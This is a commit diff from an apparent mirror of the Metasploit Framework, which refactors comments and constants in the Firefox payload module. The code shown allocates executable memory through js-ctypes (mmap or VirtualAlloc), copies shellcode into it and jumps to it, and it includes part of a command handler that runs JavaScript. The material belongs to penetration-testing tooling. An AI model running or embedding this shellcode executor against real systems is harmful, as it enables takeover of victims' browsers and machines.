infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up // comments.

bug/bundler_fix
Joe Vennix 2014-02-17 15:34:42 -06:00
parent 57449ac719
commit 318ebdb4c8
1 changed files with 5 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
lib/msf/core/payload/firefox.rb
View File

@ -22,14 +22,6 @@ module Msf::Payload::Firefox
def exec_shellcode_source def exec_shellcode_source
%Q| %Q|
var execShellcode = function(shellcode) { var execShellcode = function(shellcode) {
var POSIX = {
RWX: 7,
ANON_PRIVATE: 4098
};
var WIN = {
RWX: 0x40,
ANON_PRIVATE: 0x1000
};
var LIBS = [ var LIBS = [
"C:\\\\WINDOWS\\\\system32\\\\user32.dll", "C:\\\\WINDOWS\\\\system32\\\\user32.dll",
"/usr/lib/libSystem.B.dylib", "/usr/lib/libSystem.B.dylib",
@ -52,6 +44,7 @@ module Msf::Payload::Firefox
if (!lib) throw new Error("Could not find lib in ["+LIBS+"]"); if (!lib) throw new Error("Could not find lib in ["+LIBS+"]");
var execPosix = function() { var execPosix = function() {
var RWX = 7, ANON_PRIVATE = 4098;
var mmap = lib.declare('mmap', var mmap = lib.declare('mmap',
ctypes.default_abi, /* calling convention */ ctypes.default_abi, /* calling convention */
ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* return type */
@ -69,15 +62,16 @@ module Msf::Payload::Firefox
ctypes.voidptr_t, /* src */ ctypes.voidptr_t, /* src */
ctypes.size_t /* size to copy */ ctypes.size_t /* size to copy */
); );
var buff = mmap(null, shellcode.length, POSIX.RWX, POSIX.ANON_PRIVATE, 0, 0); var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
memcpy(buff, ctypes.jschar.array()(shellcode), shellcode.length); memcpy(buff, ctypes.jschar.array()(shellcode), shellcode.length);
// there is probably a better way to do this /* there is probably a better way to do this */
var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/); var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
if (!m) throw new Error("Could not find address of buffer."); if (!m) throw new Error("Could not find address of buffer.");
ctypes.FunctionType(ctypes.default_abi, ctypes.int).ptr(parseInt(m[1], 16))(); ctypes.FunctionType(ctypes.default_abi, ctypes.int).ptr(parseInt(m[1], 16))();
}; };
var execWindows = function() { var execWindows = function() {
var RWX = 0x40, ANON_PRIVATE = 0x1000;
var VirtualAlloc = lib.declare('VirtualAlloc', var VirtualAlloc = lib.declare('VirtualAlloc',
ctypes.winapi_abi, /* calling convention */ ctypes.winapi_abi, /* calling convention */
ctypes.voidptr_t, /* return type */ ctypes.voidptr_t, /* return type */
@ -182,7 +176,7 @@ module Msf::Payload::Firefox
var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim()); var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
if (js) { if (js) {
var tag = "[!JAVASCRIPT]"; var tag = "[!JAVASCRIPT]";
var sync = true; // avoid zalgo's reach var sync = true; /* avoid zalgo's reach */
var sent = false; var sent = false;
var retVal = null; var retVal = null;